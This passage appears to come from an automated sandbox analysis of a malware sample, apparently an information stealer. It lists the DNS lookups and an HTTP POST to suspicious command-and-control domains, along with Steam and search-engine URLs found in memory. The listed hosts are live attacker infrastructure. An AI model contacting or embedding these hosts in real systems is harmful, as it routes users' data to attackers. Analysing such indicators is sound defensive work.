charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 20 Dec 2024 06:04:12 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlu equals www.youtube.com (Youtube)
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: bellflamre.click
              Source: global trafficDNS traffic detected: DNS query: immureprech.biz
              Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
              Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
              Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
              Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
              Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
              Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
              Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Q6Qn
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=lILQ2m8IgfoI&l=e
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api2H
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.co
              Source: 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354896716.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2399977215.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354654616.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402833146.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440560885.0000000003C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(x8
              Source: 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;.
              Source: 8ZVMneG.exe, 00000003.00000002.2485639494.0000000003C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/B
              Source: 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Dr
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Ed
              Source: 8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/OF_
              Source: 8ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Spe
